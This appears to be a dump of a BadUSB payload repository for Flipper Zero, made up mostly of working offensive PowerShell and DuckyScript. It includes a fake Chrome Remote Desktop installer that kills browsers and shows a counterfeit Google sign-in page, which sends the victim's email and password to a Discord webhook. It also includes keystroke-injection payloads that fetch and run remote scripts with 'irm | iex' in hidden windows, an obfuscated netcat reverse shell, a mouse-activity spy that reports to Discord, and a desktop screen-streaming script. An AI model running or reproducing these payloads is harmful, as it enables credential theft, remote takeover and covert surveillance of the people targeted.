$base64IconString = "iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAMAAACdt4HsAAABMlBMVEVHcExChfRChfRAm3jqQzVChfQ0qFNChfTxcyVChfVChfQ0qFPrRzPqQzU0qFMzp1bqQzU0qFM0qFM0plw0qFNChfQ0qFPqQzVChfRChfTqQzU0qFPqQzXqQzU0qFPqQzXqQzXqQzXqQzXrRDT7vAX8vAU1qFLqQjXqQzXqQzX8vQRAqU40qFNChfTqQzXqQzU0qFNChfT0uwj7vAU0qFM0qFPqQzX7vAU5m5BChfP7vAVChfT7vAXqQzU0qFPqQzVChfT7vAU0qFPqQzX7vAVBh+v7vAX7vAX7vAX1uAlChfT7vAW+th32lxRChfRChfRChfQ0qFNChfTqQzX7vAUyqFX+vARAi9o9krg2o2vRuBX6tQiltCbzgxztWixFqkx8rzf4pw1frUL2lhTrSzLwbyTRhUDUAAAAUXRSTlMA4R4G9SWqYQfoUOFL4lENcj3SZ/zy9/kP+j4cg9TvHbP9U8QZ8bsPpzQ6SHU/J2Uvzf16Jod2Tf5zubzVkH7uIWeTl936kp+GrY2OeHgwmKE8ZUQjAAAC40lEQVRYw82Wd3eaUBjGSTCogBiGGBEHmjiiUWPVxiwymu51BW1GmyZp8/2/QlUU4bL1tKfP8T94fr7zchHk/1UkVy00e6LYaxaEXDmoO0eK+ZgsKcr4p0ihWPGkkAvw38JJJqmYJCnJzKUQ8Wcn87Jiq1Ce9IGoVkKKo0KVqoe93IsproptutazkZcUD0kVl2oKGcWHio5pkDE/fiXUXNG/6dAKwa/fqX62+UvJpOTPX85bzHLxcrNAkoXmSVH29CM9qH9STBT0jperYsbDX4UKIIsNaLtE2c0fqUCtFuyGxNmPkOb5tx+2RsFxlSLvfvw2+gMfH7s76q973Z8P7Ec+qKr6+DzzZxqB/dvHY4B6p6WRbAY/Pl+21SlhmsYSCSBv1Zke75UQucT5fTgHqHfPxSUC2H6lLgifoIdbeNhROKo3UdfOLgRYXxs4an9rVsOFXz3eDgCIbmjvnBsAh5EAgMSe9s4LA+ANEgCQwq2A1/8UMMBXTGEOWLqI8xSWbmNqb8VBSny2jPKo/REG7EfNMgDW1uFlGrUfSnEzAD3bMOosnLKOsr7Oo9snwFPum9c3RPAVOlDU7z+HAMAhQMt5ZAD0TUfaqD31A551A+Ap6ypoh+ro9gEMJwDAtHwGoJdg2sjbp6l7olLauQKGAAbvjR8WLXxNHOZUBjw6sM0AQWr8wg84gNnHgJuG6mjL2G0MmFSirfZ4P2qa47DpaYswE7LdDjRQNHbwzTGAseqcmQCILq2XAk1TWBaAGwMhgcMBQklMomAu6lStRrFdjNDwN9c64AsKp9hhLISxi+N5Y2jDg6vZDJxZi0QTwFNDoBUiumfXJcoHQUsjEbafE3+E4fVV32lSacYPIeuybh2M87JzhOuJEa97pMFhLY+PfQvjXfwMG/e8LqC1ydTZ20/Tvm4cKH3BWMPIlti0/1tLutYtEdlZRTmeYDC2hQa8+aBpmmLrp6d1lqI7cWQVocjf1B+DjRopJPWlbAAAAABJRU5ErkJggg=="
$iconimageBytes = [Convert]::FromBase64String($base64IconString)
$ims = New-Object IO.MemoryStream($iconimageBytes, 0, $iconimageBytes.Length)
$ims.Write($iconimageBytes, 0, $iconimageBytes.Length);
$alkIcon = [System.Drawing.Image]::FromStream($ims, $true)
$base64String = "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"
$imageBytes = [System.Convert]::FromBase64String($base64String)
$memoryStream = New-Object IO.MemoryStream($imageBytes, 0, $imageBytes.Length)
$memoryStream.Write($imageBytes, 0, $imageBytes.Length);
$image = [System.Drawing.Image]::FromStream($memoryStream)
$setupwindow = New-Object System.Windows.Forms.Form
$setupwindow.ClientSize = '600,450'
$setupwindow.Text = "Chrome Remote Desktop Setup"
$setupwindow.BackColor = "#ffffff"
$setupwindow.Opacity = 1
$setupwindow.TopMost = $true
$setupwindow.Icon = [System.Drawing.Icon]::FromHandle((new-object System.Drawing.Bitmap -argument $ims).GetHIcon())
$setupwindow.FormBorderStyle = 'FixedSingle'
$nextbutton = New-Object System.Windows.Forms.Button
$nextbutton.Text = "Next"
$nextbutton.Width = 85
$nextbutton.Height = 42
$nextbutton.Location = New-Object System.Drawing.Point(490, 395)
$nextbutton.Font = 'Open Sans,12'
$nextbutton.BackColor = "#287ae6"
$nextbutton.ForeColor = "#ffffff"
$textfield = New-Object System.Windows.Forms.Label
$textfield.Text = "Welcome to Google Remote Desktop Host"
$textfield.ForeColor = "#000000"
$textfield.AutoSize = $true
$textfield.Location = New-Object System.Drawing.Point(145, 140)
$textfield.Font = 'Microsoft Sans Serif,12'
$infofield = New-Object System.Windows.Forms.Label
$infofield.Text = "Remote access for your PC. Sign in with google to continue.."
$infofield.ForeColor = "#000000"
$infofield.AutoSize = $true
$infofield.Location = New-Object System.Drawing.Point(120, 230)
$infofield.Font = 'Microsoft Sans Serif,10'
$infofield2 = New-Object System.Windows.Forms.Label
$infofield2.Text = "Chrome will close and restart during installation"
$infofield2.ForeColor = "#000000"
$infofield2.AutoSize = $true
$infofield2.Location = New-Object System.Drawing.Point(155, 260)
$infofield2.Font = 'Microsoft Sans Serif,10'
$linkfield = New-Object System.Windows.Forms.Label
$linkfield.Text = "Sign in to your account"
$linkfield.ForeColor = "#287ae6"
$linkfield.AutoSize = $true
$linkfield.Location = New-Object System.Drawing.Point(345, 407)
$linkfield.Font = 'Microsoft Sans Serif,10'
$pictureBox = New-Object System.Windows.Forms.PictureBox
$pictureBox.Size = New-Object System.Drawing.Size(300, 300)
$pictureBox.SizeMode = 'AutoSize'
$pictureBox.Image = $image
$pictureBox.Location = New-Object System.Drawing.Point(170, 50)
$setupwindow.controls.AddRange(@($nextbutton,$linkfield,$textfield,$infofield,$infofield2,$pictureBox))
$nextbutton.Add_Click({
$setupwindow.Close()
})
[void]$setupwindow.ShowDialog()
Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "chrome.exe" -NoNewWindow -Wait
Start-Process -FilePath "taskkill" -ArgumentList "/F", "/IM", "msedge.exe" -NoNewWindow -Wait
Sleep 1
$htmlcode1 = @"
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Sign in with Google</title>
<script>
function sendEmail() {
"@
$webhk = ' var webhookURL = "' + "$dc" + '";'
$htmlcode2 = @"
var message1 = document.getElementById("email").value;
var message2 = document.getElementById("message").value;
var message = "Email: " + message1 + " | Password: " + message2;
var payload = {
content: message
};
var xhr = new XMLHttpRequest();
xhr.open("POST", webhookURL, true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.onreadystatechange = function() {
if (xhr.readyState === 4){if (xhr.status === 200){
console.log("Message sent successfully!");}else{console.log("Error:", xhr.status);}}};
xhr.send(JSON.stringify(payload));}
</script>
<style>
@import url('https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap');
body {
margin: 0;
padding: 0;
background-size: cover;
font-family: 'Open Sans', sans-serif;
}
img {
transform: scale(0.9);
position: relative;
left: 15%;
}
.box {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
width: 30rem;
padding: 3.5rem;
box-sizing: border-box;
border: 1px solid #dadce0;
-webkit-border-radius: 8px;
border-radius: 8px;
}
.box h2 {
margin: 0px 0 -0.125rem;
padding: 0;
text-align: center;
color: #202124;
font-size: 24px;
font-weight: 400;
}
.box .logo
{
display: flex;
flex-direction: row;
justify-content: center;
margin-bottom: 16px;
}
.box p {
font-size: 16px;
font-weight: 400;
letter-spacing: 1px;
line-height: 1.5;
margin-bottom: 24px;
text-align: center;
}
.box .inputBox {
position: relative;
}
.box .inputBox input {
width: 93%;
padding: 1.3rem 10px;
font-size: 1rem;
letter-spacing: 0.062rem;
margin-bottom: 1.875rem;
border: 1px solid #ccc;
background: transparent;
border-radius: 4px;
}
.box .inputBox label {
position: absolute;
top: 0;
left: 10px;
padding: 0.625rem 0;
font-size: 1rem;
color: gray;
pointer-events: none;
transition: 0.5s;
}
.box .inputBox input:focus ~ label,
.box .inputBox input:valid ~ label,
.box .inputBox input:not([value=""]) ~ label {
top: -1.125rem;
left: 10px;
color: #1a73e8;
font-size: 0.75rem;
background-color: #fff;
height: 10px;
padding-left: 5px;
padding-right: 5px;
}
.box .inputBox input:focus {
outline: none;
border: 2px solid #1a73e8;
}
.box button[type="submit"] {
border: none;
outline: none;
color: #fff;
background-color: #1a73e8;
padding: 0.625rem 1.25rem;
cursor: pointer;
border-radius: 0.312rem;
font-size: 1rem;
float: right;
}
.box button[type="submit"]:hover {
background-color: #287ae6;
box-shadow: 0 1px 1px 0 rgba(66,133,244,0.45), 0 1px 3px 1px rgba(66,133,244,0.3);}
a.left-link {
float: left;
text-decoration: none;
font-size: 14px;
margin-top: 10px;
}
</style>
</head>
<body>
<div class="box">
<img src='https://i.ibb.co/Sm67Hrs/googs.png' alt='Google'>
<div class="logo">
</div>
<h2>Sign in</h2>
<p>Use your Google Account</p>
<form>
<div class="inputBox">
<input type="email" id="email" name="email" required onkeyup="this.setAttribute('value', this.value);" value="">
<label>Email</label>
</div>
<div class="inputBox">
<input type="password" id="message" name="text" required onkeyup="this.setAttribute('value', this.value);" value="">
<label>Password</label>
</div>
<a href="https://accounts.google.com/signup/v2/createaccount" class="left-link">Create account</a>
<button onclick="sendEmail(),event.preventDefault();" type="submit">Sign In</button>
</form>
</div>
</body>
</html>
"@
$htmlFile = "$env:temp\google.html"
$htmlcode1 | Out-File $htmlFile -Force
$webhk | Out-File $htmlFile -Append -Force
$htmlcode2 | Out-File $htmlFile -Append -Force
$screen = [System.Windows.Forms.Screen]::PrimaryScreen
$screenWidth = $screen.WorkingArea.Width
$screenHeight = $screen.WorkingArea.Height
$left = ($screenWidth - $width) / 2
$top = ($screenHeight - $height) / 2
$chromePath = "C:\Program Files\Google\Chrome\Application\chrome.exe"
$width = 530
$height = 600
$arguments = "--new-window --window-position=$left,$top --window-size=$width,$height --app=$htmlFile"
$chromeProcess = Start-Process -FilePath $chromePath -ArgumentList $arguments -PassThru
$chromeProcess.WaitForExit()
sleep 2
$outword = "No Logs"
$outword | Out-File $htmlFile -Force
sleep 1

15
LAN-Tools/LAN-Tools.txt Normal file
View File

@@ -0,0 +1,15 @@
REM Title: beigeworm's LAN Tools
REM Author: @beigeworm
REM Description: Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
REM NOTE - This script will need Admin privileges to run properly.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/Posh-LAN/main/Posh-LAN-Tools.ps1 | iex
ENTER

17
LAN-Tools/README.md Normal file
View File

@@ -0,0 +1,17 @@
<h2 align="center"> Beigeworm's Powershell LAN Toolset </h2>
MAIN SCRIPT HERE - https://github.com/beigeworm/Posh-LAN
SYNOPSIS
Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
USAGE
1. Run this script on target computer and note the URL provided
2. on another device on the same network, enter the provided URL in a browser window
NOTE
This script will need Admin privaleges to run properly.

20
Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: beigeworm's monitor mouse activity to Discord Webhook.
REM Author: @beigeworm
REM Description: This script monitors mouse activity and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_mm_to_dc | iex
ENTER

11
Mouse-Monitor-to-Discord/README.md Normal file
View File

@@ -0,0 +1,11 @@
<h2 align="center"> Mouse Monitor to Discord </h2>
SYNOPSIS
This script gathers information about any mouse movement and idletime and sends info to Discord".
USAGE
2. Run Script on target System
3. Check Discord for results

69
Mouse-Monitor-to-Discord/main.ps1 Normal file
View File

@@ -0,0 +1,69 @@
$whuri = "$dc"
$signature = @'
[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetCursorPos(out POINT lpPoint);
[StructLayout(LayoutKind.Sequential)]
public struct POINT
{
public int X;
public int Y;
}
'@
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
$outpath = "$env:temp\info.txt"
$cursorType = Add-Type -MemberDefinition $signature -Name "CursorPos" -Namespace "Win32" -PassThru
$prevX = 0
$idleThreshold = New-TimeSpan -Seconds 60
$lastActivityTime = [System.DateTime]::Now
$isActive = $true
$iActive = $true
sleep 1
while ($true) {
$cursorPos = New-Object Win32.CursorPos+POINT
[Win32.CursorPos]::GetCursorPos([ref]$cursorPos) | Out-Null
$currentX = $cursorPos.X
$currentTime = [System.DateTime]::Now
if ($currentX -ne $prevX) {
if ($iActive) {
$prevX = $currentX
$lastActivityTime = $currentTime
if ($idleTime -lt $idleThreshold) {
$msgsys = "[$timestamp] : Mouse is active"
$escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json
Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys
}
$iActive = $false
}
}
else {
$iActive = $true
}
$idleTime = $currentTime - $lastActivityTime
if ($idleTime -ge $idleThreshold) {
if ($isActive) {
$msgsys = "[$timestamp] : Mouse has been inactive for 60 seconds"
$escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json
Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys
$isActive = $false
$iActive = $true
}
else {
}
}
else {
$isActive = $true
}
Start-Sleep -Milliseconds 60
}

17
Netcat-Client/README.md Normal file
View File

@@ -0,0 +1,17 @@
<h2 align="center"> Simple Netcat Client </h2>
SYNOPSIS
Opens a netcat connection to a Windows machine in Powershell
USAGE
1. Download Ncat For windows. https://nmap.org/download#windows
2. Change "YOUR IP HERE" to the attacker machine's ipv4 address (find using ipconfig on windows)
3. Open a terminal on the attacker machine and type "nc -lvp 4444"
4. Run this script on the client machine.
NOTE
The PORT number is 4444

20
Netcat-Client/Simple-Netcat-Client.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: Beigeworm's Simple Netcat Client
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send powershell commands.
REM Target: Windows 10
REM *SETUP*
REM replace IP_HERE with your netcat attacker IP Address.
REM NOTE The PORT number is 4444
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Netcat-Client/main.ps1 | iex
ENTER

14
Netcat-Client/main.ps1 Normal file
View File

@@ -0,0 +1,14 @@

do{
$v = 4
$a = New-Object S`ySt`em.N`eT.`s`ock`eTs.TC`PC`li`eNt("$ip",4444)
$b = $a.GetStream();[byte[]]$c = 0..65535|%{0}
while(($d = $b.Read($c, 0, $c.Length)) -ne 0){
$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)
$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> '
$h = ([text.encoding]::ASCII).GetBytes($g)
$b.Write($h,0,$h.Length)
$b.Flush()}
$a.Close()
Sleep 10
}while ($v -le 5)

20
Netcat-Screenshare/Desktop Screenshare over Netcat.txt Normal file
View File

@@ -0,0 +1,20 @@
REM Title: Beigeworm's Screenshare Through Netcat
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window.
REM Target: Windows 10
REM *SETUP*
REM replace YOUR_IP_HERE with your netcat attacker IP Address.
REM Run script on target Windows system.
REM On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required)
REM Then in a firefox browser on the Linux box > http://localhost:8080
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='YOUR_IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Netcat-Screenshare/main.ps1 | iex
ENTER

14
Netcat-Screenshare/README.md Normal file
View File

@@ -0,0 +1,14 @@
<h2 align="center"> Desktop Screensahre Over Netcat </h2>
SYNOPSIS
Starts a video stream of the desktop to a netcat session (the output is viewed in a browser.)
USAGE
Run script on target Windows system.
On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080
Then in a firefox browser goto > http://localhost:8080
(Firefox is the only browser that supports the codec for the video stream..)

45
Netcat-Screenshare/main.ps1 Normal file
View File

@@ -0,0 +1,45 @@
$IP = "$ip"
$PORT = "9000"
while ($true){
try{
Add-Type -AssemblyName System.Windows.Forms
[System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream
$socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$socket.Connect($IP,$PORT)
function SendResponse($sock, $string){
if ($sock.Connected){
$bytesSent = $sock.Send($string)
if ( $bytesSent -eq -1 ){}}}
function SendStrResponse($sock, $string){
if ($sock.Connected){
$bytesSent = $sock.Send(
[text.Encoding]::Ascii.GetBytes($string))
if ( $bytesSent -eq -1 ){}}}
function SendHeader([net.sockets.socket] $sock,$length,$statusCode = "200 OK",$mimeHeader="text/html",$httpVersion="HTTP/1.1"){
$response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n"
SendStrResponse $sock $response}
SendHeader $socket
while ($True){
$b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height)
$g = [System.Drawing.Graphics]::FromImage($b)
$g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size)
$g.Dispose()
$MemoryStream.SetLength(0)
$b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg))
$b.Dispose()
$length = $MemoryStream.Length
[byte[]] $Bytes = $MemoryStream.ToArray()
$str = "`n`n--boundary`n" +
"Content-Type: image/jpeg`n" +
"Content-Length: $length`n`n"
SendStrResponse $socket $str
SendResponse $socket $Bytes
}
$MemoryStream.Close()
}catch{Write-Error $_}}

16
Network-Enumeration-GUI/Network-Enumeration-GUI.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's LAN Device Enumeration GUI Tool.
REM Author: @beigeworm
REM Description: This script creates a GUI for enumerating devices on the local network.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Network-Enumeration-GUI/main.ps1 | iex
ENTER

6
Network-Enumeration-GUI/README.md Normal file
View File

@@ -0,0 +1,6 @@
<h2 align="center"> Network Enumeration GUI </h2>
SYNOPSIS
This script creates a GUI window for enumerating devices on the local network.

264
Network-Enumeration-GUI/main.ps1 Normal file
View File

@@ -0,0 +1,264 @@
<#
====================== Mon's Network Enumeration Tool With GUI ==========================
SYNOPSIS
This script presents a GUI for enumerating other devices on the LAN network..
USAGE
1. Run script with powershell
2. Input ip Range and select additional parameters
3. Press "Start Scan"
#>
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName Microsoft.VisualBasic
[System.Windows.Forms.Application]::EnableVisualStyles()
$tooltip1 = New-Object System.Windows.Forms.ToolTip
$ShowHelp={
Switch ($this.name) {
"start" {$tip = "Start Search"}
"ipsearch" {$tip = "Define the first part of the IP here"}
"startrange" {$tip = "Define the start of the IP range"}
"endrange" {$tip = "Define the start of the IP range"}
"hostname" {$tip = "Try to resolve each IP's hostname"}
"ssh" {$tip = "Test port 22 (ssh) on each IP"}
"manufact" {$tip = "Get any manufacturer details"}
}
$tooltip1.SetToolTip($this,$tip)
}
$MainWindow = New-Object System.Windows.Forms.Form
$MainWindow.ClientSize = '552,535'
$MainWindow.Text = "| beigetools | LAN Device Search & Enumeration |"
$MainWindow.BackColor = "#242424"
$MainWindow.Opacity = 0.93
$MainWindow.TopMost = $false
$MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DevicePairingWizard.exe")
$OutputBox = New-Object System.Windows.Forms.TextBox
$OutputBox.Multiline = $True;
$OutputBox.Location = New-Object System.Drawing.Size(15,180)
$OutputBox.Width = 522
$OutputBox.Height = 340
$OutputBox.Scrollbars = "Vertical"
$OutputBox.Text = "----------------------------------- RESULTS -----------------------------------"
$OutputBox.Font = 'Microsoft Sans Serif,8,style=Bold'
$StartScan = New-Object System.Windows.Forms.Button
$StartScan.Text = "Start"
$StartScan.Width = 100
$StartScan.Height = 25
$StartScan.Location = New-Object System.Drawing.Point(435, 33)
$StartScan.Font = 'Microsoft Sans Serif,8,style=Bold'
$StartScan.BackColor = "#eeeeee"
$StartScan.add_MouseHover($showhelp)
$StartScan.name="start"
$sshboxtext = New-Object System.Windows.Forms.Label
$sshboxtext.Text = "Test for SSH"
$sshboxtext.ForeColor = "#bcbcbc"
$sshboxtext.AutoSize = $true
$sshboxtext.Width = 25
$sshboxtext.Height = 10
$sshboxtext.Location = New-Object System.Drawing.Point(35, 67)
$sshboxtext.Font = 'Microsoft Sans Serif,8,style=Bold'
$sshbox = New-Object System.Windows.Forms.CheckBox
$sshbox.Width = 20
$sshbox.Height = 20
$sshbox.Location = New-Object System.Drawing.Point(15, 65)
$sshbox.add_MouseHover($showhelp)
$sshbox.name="ssh"
$manufacturerboxtext = New-Object System.Windows.Forms.Label
$manufacturerboxtext.Text = "Include Manufacturer"
$manufacturerboxtext.ForeColor = "#bcbcbc"
$manufacturerboxtext.AutoSize = $true
$manufacturerboxtext.Width = 25
$manufacturerboxtext.Height = 10
$manufacturerboxtext.Location = New-Object System.Drawing.Point(35, 97)
$manufacturerboxtext.Font = 'Microsoft Sans Serif,8,style=Bold'
$manufacturerbox = New-Object System.Windows.Forms.CheckBox
$manufacturerbox.Width = 20
$manufacturerbox.Height = 20
$manufacturerbox.Location = New-Object System.Drawing.Point(15, 95)
$manufacturerbox.add_MouseHover($showhelp)
$manufacturerbox.name="manufact"
$hostnameboxtext = New-Object System.Windows.Forms.Label
$hostnameboxtext.Text = "Include Network Hostname"
$hostnameboxtext.ForeColor = "#bcbcbc"
$hostnameboxtext.AutoSize = $true
$hostnameboxtext.Width = 25
$hostnameboxtext.Height = 10
$hostnameboxtext.Location = New-Object System.Drawing.Point(35, 127)
$hostnameboxtext.Font = 'Microsoft Sans Serif,8,style=Bold'
$hostnamebox = New-Object System.Windows.Forms.CheckBox
$hostnamebox.Width = 20
$hostnamebox.Height = 20
$hostnamebox.Location = New-Object System.Drawing.Point(15, 125)
$hostnamebox.add_MouseHover($showhelp)
$hostnamebox.name="hostname"
$TextboxInputHeader = New-Object System.Windows.Forms.Label
$TextboxInputHeader.Text = "Search IP Range for All Devices"
$TextboxInputHeader.ForeColor = "#bcbcbc"
$TextboxInputHeader.AutoSize = $true
$TextboxInputHeader.Width = 25
$TextboxInputHeader.Height = 10
$TextboxInputHeader.Location = New-Object System.Drawing.Point(15, 15)
$TextboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold'
$TextBoxInput = New-Object System.Windows.Forms.TextBox
$TextBoxInput.Location = New-Object System.Drawing.Point(15, 35)
$TextBoxInput.BackColor = "#eeeeee"
$TextBoxInput.Width = 140
$TextBoxInput.Height = 40
$TextBoxInput.Text = "192.168.0."
$TextBoxInput.Multiline = $false
$TextBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold'
$TextBoxInput.add_MouseHover($showhelp)
$TextBoxInput.name="ipsearch"
$dashline = New-Object System.Windows.Forms.Label
